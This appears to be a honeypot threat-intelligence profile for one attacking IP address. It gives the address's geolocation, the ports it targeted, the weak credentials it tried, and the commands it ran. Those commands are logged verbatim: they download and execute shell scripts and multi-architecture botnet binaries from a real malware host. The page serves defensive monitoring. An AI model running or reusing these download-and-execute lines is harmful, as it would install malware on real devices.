Active Threat • MEDIUM
176.65.148.45
Country of Origin: 🇳🇱 Netherlands
First Detected: 15/01/2026
Last Activity: 15/01/2026
ISP: Pfcloud UG (haftungsbeschrankt)
🎯 46 Total Attacks
🔌 2 Ports
📡 2 Attack Types
🦠 9 Malware
Geolocation
- Country: 🇳🇱 Netherlands
- City: Eygelshoven
- ASN: AS51396
- ISP: Pfcloud UG (haftungsbeschrankt)
Attack Types
adbhoney
cowrie
Ports Attacked
5555, 23
Associated Malware
Credentials Attempted
- 🔐 admin/admin (1x)
- 🔐 root/admin (1x)
Commands Executed
$ cd /data/local/tmp/; busybox wget http://82.221.139.173:3712/w.sh; sh w.sh; curl http://82.221.139.173:3712/c.sh; sh c.sh; wget http://82.221.139.173:3712/wget.sh; sh wget.sh; curl http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox wget http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox curl http://82.221.139.173:3712/wget.sh; sh wget.sh
(5x)
$ cd /tmp;rm -rf RANGER
(2x)
$ wget http://82.221.139.173:3712/bins/systemx64.arm;chmod 777 systemx64.arm;./systemx64.arm TELNETarm
(2x)
$ rm -rf RANGER
(1x)
$ wget http://82.221.139.173:3712/bins/systemx64.spc;chmod 777 systemx64.spc;./systemx64.spc TELNETspc
(1x)
$ wget http://82.221.139.173:3712/bins/systemx64.sh4;chmod 777 systemx64.sh4;./systemx64.sh4 TELNETsh4
(1x)
$ wget http://82.221.139.173:3712/bins/systemx64.arm7;chmod 777 systemx64.arm7;./systemx64.arm7 TELNETarm7
(1x)
$ wget http://82.221.139.173:3712/bins/systemx64.x86;chmod 777 systemx64.x86;./systemx64.x86 TELNETx86
(1x)
$ wget http://82.221.139.173:3712/bins/systemx64.mpsl;chmod 777 systemx64.mpsl;./systemx64.mpsl TELNETmpsl
(1x)
URLhaus Intel • 3 URLs • abuse.ch
This IP used the following known malicious URLs:
- http://82.221.139.173:3712/c.sh • offline • malware_download, geofenced, opendir, sh
- http://82.221.139.173:3712/wget.sh • offline • malware_download, geofenced, opendir, sh
- http://82.221.139.173:3712/w.sh • offline • malware_download, geofenced, opendir, sh
Risk Assessment
45/100
Low / Medium / High / Critical